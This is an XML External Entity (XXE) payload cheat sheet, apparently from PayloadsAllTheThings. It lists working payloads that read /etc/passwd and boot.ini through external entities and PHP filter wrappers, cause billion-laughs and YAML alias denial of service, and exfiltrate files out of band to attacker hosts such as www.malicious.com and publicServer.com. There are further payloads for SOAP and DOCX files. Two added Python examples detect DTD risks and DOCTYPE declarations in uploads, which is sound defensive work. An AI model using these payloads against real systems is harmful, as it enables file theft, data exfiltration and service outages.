# XML External Entity
An XML External Entity (XXE) attack targets an application that parses XML input with a parser that honours entity declarations in the document's DTD. A crafted `DOCTYPE` can then make the parser read local files, send requests to other systems, or exhaust memory and CPU, as the payloads below show.
## Exploit
Basic test: an internal entity only, which checks whether the parser substitutes entities declared in the DTD at all.
```xml
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&example;</lastName>
</userInfo>
```
## Basic XXE
Classic XXE
```xml
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
```
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>
```
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" > ]><foo>&xxe;</foo>
```
Classic XXE Base64 encoded
```xml
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
```
## PHP Wrapper inside XXE
```xml
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
 <contact>
  <name>Jean &xxe; Dupont</name>
  <phone>00 11 22 33 44</phone>
  <adress>42 rue du CTF</adress>
  <zipcode>75000</zipcode>
  <city>Paris</city>
 </contact>
</contacts>
```
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
]>
<foo>&xxe;</foo>
```
## Denial of service
Denial of Service - Billion Laughs attack
```xml
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
```
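The payloads in the Basic XXE, PHP wrapper and Billion Laughs sections all announce themselves in the DTD before any content is parsed, so a gateway can inspect the prolog and refuse the document before anything is fetched or expanded. The following is an added example (standard library only, not code from the original page or from PayloadsAllTheThings): `collect_declarations` runs expat over the prolog with no `ExternalEntityRefHandler` and aborts at the root element, `expanded_size` computes the worst-case expansion of each internal entity from the declarations alone (memoised, so a deep billion-laughs chain is costed in a handful of steps instead of being expanded), and `assess` turns both into a list of reject reasons. Function names, the `DEFAULT_MAX_EXPANSION` budget and the three sample documents are constructed for this example.

```python
import re
import xml.parsers.expat

# Budget for the worst-case expanded size of one internal entity
# (constructed value for this example; tune it for the application).
DEFAULT_MAX_EXPANSION = 10_000
_REF = re.compile(r"&(#?[^&;\s]+);")


class _PrologDone(Exception):
    pass  # raised from the start-element handler to stop expat before any content


def collect_declarations(xml_bytes):
    """Parse only the prolog (XML declaration and DOCTYPE) and report its declarations.
    No ExternalEntityRefHandler is set, so SYSTEM identifiers are never fetched, and
    parsing stops at the root element, so no entity is ever expanded."""
    doctype, entities, errors = {}, {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        doctype.update(name=name, system_id=sysid, public_id=pubid)

    def on_entity(name, is_pe, value, base, sysid, pubid, notation):
        # `value` is the literal replacement text; expat leaves general entity
        # references inside it (e.g. "&a0;&a0;") unexpanded.
        entities[("%" if is_pe else "") + name] = {
            "parameter": bool(is_pe),
            "external": sysid is not None or pubid is not None,
            "system_id": sysid, "public_id": pubid, "value": value,
        }

    def on_start_element(name, attrs):
        raise _PrologDone

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start_element
    try:
        parser.Parse(xml_bytes, True)
    except _PrologDone:
        pass
    except xml.parsers.expat.ExpatError as exc:
        errors.append(str(exc))
    return {"doctype": doctype, "entities": entities, "errors": errors}


def expanded_size(entities, name, memo=None, _stack=()):
    """Bytes produced by fully expanding internal general entity `name`.
    Raises ValueError on a reference cycle (itself a well-formedness error)."""
    memo = {} if memo is None else memo
    if name in memo:
        return memo[name]
    if name in _stack:
        raise ValueError("entity reference cycle through &%s;" % name)
    rec = entities.get(name)
    if rec is None or rec["external"]:
        return 0  # undefined or external: nothing expands locally
    value, total, last = rec["value"] or "", 0, 0
    for m in _REF.finditer(value):
        total += m.start() - last
        ref = m.group(1)
        if ref.startswith("#") or ref in ("lt", "gt", "amp", "quot", "apos"):
            total += 1  # character reference or predefined entity
        else:
            total += expanded_size(entities, ref, memo, _stack + (name,))
        last = m.end()
    memo[name] = total + len(value) - last
    return memo[name]


def assess(xml_bytes, max_expansion=DEFAULT_MAX_EXPANSION):
    """Reasons to reject the document; an empty list means no DTD risk was found."""
    decl = collect_declarations(xml_bytes)
    reasons = ["not well-formed: " + e for e in decl["errors"]]
    dt = decl["doctype"]
    if dt.get("system_id") or dt.get("public_id"):
        reasons.append("DOCTYPE loads an external DTD: %s" % (dt["system_id"] or dt["public_id"]))
    memo = {}
    for name, rec in decl["entities"].items():
        if rec["external"]:
            reasons.append("external entity %s -> %s" % (name, rec["system_id"] or rec["public_id"]))
        elif rec["parameter"]:
            reasons.append("parameter entity %s declared" % name)
        else:
            try:
                size = expanded_size(decl["entities"], name, memo)
            except ValueError as exc:
                reasons.append(str(exc))
                continue
            if size > max_expansion:
                reasons.append("entity &%s; expands to %d bytes (limit %d)" % (name, size, max_expansion))
    return reasons


# Constructed samples mirroring the payloads above.
BASIC_TEST = (b'<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example "Doe">]>'
              b"<userInfo><lastName>&example;</lastName></userInfo>")
CLASSIC_XXE = (b'<?xml version="1.0"?><!DOCTYPE data [<!ELEMENT data ANY>'
               b'<!ENTITY file SYSTEM "file:///etc/passwd">]><data>&file;</data>')
BILLION_LAUGHS = (b'<!DOCTYPE data [<!ENTITY a0 "dos">'
                  + b"".join(b'<!ENTITY a%d "%s">' % (i, (b"&a%d;" % (i - 1)) * 10) for i in range(1, 5))
                  + b"]><data>&a4;</data>")
```

`assess(CLASSIC_XXE)` reports the `file:///etc/passwd` system identifier (a `php://` wrapper would be reported the same way, since the scheme is irrelevant to the check), and `assess(BILLION_LAUGHS)` rejects `a4` for expanding to 30000 bytes against the 10000-byte budget, without ever expanding it. Expat itself applies an amplification limit in recent versions, but it only activates above a size threshold; the pre-check above lets the application choose its own budget and log what the document tried to declare.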
YAML attack (the same expansion through YAML anchors and aliases)
```yaml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
## Blind XXE - Out of Band
### Blind XXE
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]>
<foo>&callhome;</foo>
```
### XXE OOB Attack (Yunusov, 2013)
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>
```

File stored on http://publicServer.com/parameterEntity_oob.dtd

```xml
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'> ">
%all;
```
### XXE OOB with DTD and PHP filter
```xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
```

File stored on http://127.0.0.1/dtd.xml

```xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'> ">
```
### XXE Inside SOAP
```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
```
### XXE Inside DOCX file
Format of an Open XML file (inject the payload in any .xml file):
- /_rels/.rels
- [Content_Types].xml
- Default Main Document Part
- /word/document.xml
- /ppt/presentation.xml
- /xl/workbook.xml

Then update the archive with the modified part: `zip -u xxe.docx [Content_Types].xml`

Tool: https://github.com/BuffaloWill/oxml_xxe, which supports the following formats:
- DOCX/XLSX/PPTX
- ODT/ODG/ODP/ODS
- SVG
- XML
- PDF (experimental)
- JPG (experimental)
- GIF (experimental)
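Because an Office Open XML document is a zip archive of XML parts, the upload handler can open the container itself and refuse any part that carries a `DOCTYPE` before a document library parses it. The following added example (standard library only; not code from the page, from PayloadsAllTheThings or from oxml_xxe) does that for the part names listed above, skips non-XML members, bounds the size of what it inspects, and normalises UTF-16 parts so a byte-level match is not evaded by a different encoding; `scan_ooxml` and `build_sample_docx` are names constructed here, and the sample archive is a constructed minimal stand-in for a real .docx.

```python
import io
import re
import zipfile

# A DTD can only appear inside a DOCTYPE, so its presence in any XML part is
# enough to reject the upload before a parser sees it. The match is on raw
# bytes, so UTF-16 parts are converted first or the pattern would miss them.
_DOCTYPE = re.compile(rb"<!DOCTYPE")
_XML_PART = re.compile(r"\.(xml|rels)$", re.IGNORECASE)
MAX_PART_BYTES = 50 * 1024 * 1024  # constructed limit; also blunts nested zip bombs


def _as_utf8(data):
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):  # UTF-16 byte order mark
        return data.decode("utf-16").encode("utf-8")
    return data


def scan_ooxml(zip_bytes, max_part_bytes=MAX_PART_BYTES):
    """Return [(part_name, reason)] for every part that must not reach an XML parser."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not _XML_PART.search(info.filename):
                continue  # images, fonts and the like are never parsed as XML
            if info.file_size > max_part_bytes:
                findings.append((info.filename, "part too large to inspect (%d bytes)" % info.file_size))
                continue
            if _DOCTYPE.search(_as_utf8(zf.read(info.filename))):
                findings.append((info.filename, "contains a DOCTYPE declaration"))
    return findings


def build_sample_docx(poisoned, utf16=False):
    """Constructed minimal .docx-like archive. With poisoned=True, word/document.xml
    carries the classic XXE payload from above; utf16=True stores that part as UTF-16."""
    doc = '<?xml version="1.0"?>'
    if poisoned:
        doc += '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    doc += ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body>%s</w:body></w:document>' % ("&xxe;" if poisoned else "text"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels",
                    '<?xml version="1.0"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>')
        zf.writestr("word/document.xml", doc.encode("utf-16") if utf16 else doc)
        # A binary member containing the same bytes is ignored: it is never parsed as XML.
        zf.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n<!DOCTYPE not-xml>")
    return buf.getvalue()
```

The scan is deliberately conservative: a `<!DOCTYPE` inside a comment or CDATA section is also rejected, which is acceptable for a gatekeeper since real Office parts never carry a DTD. Whatever passes this check still belongs to a parser configured not to resolve external entities.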
## Thanks to
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
* [Detecting and exploiting XXE in SAML Interfaces - Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
* [Exploiting XXE in file upload functionality - BlackHat webcast, 11/19/15, Will Vandevanter (@_will_is_)](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)